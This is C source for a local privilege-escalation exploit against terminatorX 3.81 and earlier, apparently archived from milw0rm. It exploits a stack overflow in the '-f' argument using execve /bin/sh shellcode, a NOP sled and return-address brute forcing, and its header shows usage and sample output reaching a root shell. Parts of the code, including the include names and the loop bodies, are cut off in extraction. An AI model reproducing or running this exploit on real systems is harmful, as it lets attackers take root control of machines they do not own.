/* TerminatorX V. <= 3.81 local root exploit by Li0n7 * * Typical local stack-based overflow * * Bugs discovered by c0wboy from 0x333 * * Contact Li0n7 voila fr * * Usage: ./terminatorX-exp [-r ][-b [-s ]] * * -r : no bruteforcing, try to execute shellcode with as return address * -b: enables bruteforcing * -s: bruteforces by using return address from to 0x00000000 * * Example: * *root@li0n7:/tmp/test/exploits# ./terminatorX-exp -b * * exploit: terminatorX V. <= 3.81 local root exploit by Li0n7 * discoverer: c0wb0y (www.0x333.org) * visit us: http://www.ioc.fr.st * contact me: Li0n7[at]voila[dot]fr * usage: ./xterminator2 [-r ][-b [-s ]] * *[+] Starting bruteforcing... *[+] Testing 0xbffff734... *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. *... *[+] Testing 0xbffff66c... *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. *... *tX: err: Error parsing terminatorXrc. *tX: Failed loading terminatorXrc - trying to load old binary rc. *+ tX_warning: LADSPA_PATH not set. Trying /usr/lib/ladspa:/usr/local/lib/ladspa ** tX_error: tX: Error: couldn't access directory "/usr/lib/ladspa". *+ tX_warning: Plugin "Sine Oscillator (Freq:audio, Amp:audio)" disabled. Not a 1-in/1-out plugin. *+ tX_warning: Plugin "Sine Oscillator (Freq:control, Amp:control)" disabled. Not a 1-in/1-out plugin. *+ tX_warning: Plugin "Stereo Amplifier" disabled. Not a 1-in/1-out plugin. *+ tX_warning: Plugin "White Noise Source" disabled. Not a 1-in/1-out plugin. *warning: failed to load external entity "%90%90...%90%901%C0Ph//shh/bin%...%BFl%F6%FF%BF" * *(terminatorX:3085): WARNING **: Invalid UTF8 string passed to pango_layout_set_text() *sh-2.05b# exit *exit *[+] Exited: shell's ret code = 0 *[+] Ret address found: 0xbffff66c * */ #include #include #include #include #include #include #define BSIZE 200 #define D_START 0xbffff734 #define PATH "/usr/local/bin/terminatorX" #define RET 0xbffff69e char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; char *buffer,*ptr; void checkme(char *buffer) { if(!buffer) { fprintf(stderr,"[-] Can't allocate memory,exiting...\n"); exit(0); } return; } void exec_vuln() { execl(PATH,PATH,"-f",buffer,NULL); } int tease() { pid_t pid; pid_t wpid; int status; pid = fork(); if ( pid == -1 ) { fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno)); exit(13); } else if ( pid == 0 ) { exec_vuln(); } else { wpid = wait(&status); if ( wpid == -1 ) { fprintf(stderr,"[-] %s: wait()\n", strerror(errno)); return 1; } else if ( wpid != pid ) abort(); else { if ( WIFEXITED(status) ) { printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status)); return WEXITSTATUS(status); } else if ( WIFSIGNALED(status) ) { return WTERMSIG(status); } else { fprintf(stderr, "[-] Stopped.\n"); } } } return 1; } int make_string(long ret_addr) { int i; long ret,addr,*addr_ptr; buffer = (char *)malloc(512); if(!buffer) { fprintf(stderr,"[-] Can't allocate memory, exiting...\n"); exit(-1); } ret = ret_addr; ptr = buffer; memset(ptr,0x90,BSIZE-strlen(shellcode)); ptr += BSIZE-strlen(shellcode); for(i=0;i][-b [-s ]]\n\n",argv0); } int main(int argc,char *argv[]) { char * option_list = "br:s:"; int option,brute = 0, opterr = 0; long ret,start = D_START; banner(argv[0]); if (argc < 1) exit(-1); while((option = getopt(argc,argv,option_list)) != -1) switch(option) { case 'b': brute = 1; break; case 'r': ret = strtoul(optarg,NULL,0); make_string(ret); tease(); exit(0); break; case 's': start = strtoul(optarg,NULL,0); break; case '?': fprintf(stderr,"[-] option \'%c\' invalid\n",optopt); banner(argv[0]); exit(-1); } if(brute) bruteforce(start); return 0; } // milw0rm.com [2003-11-13]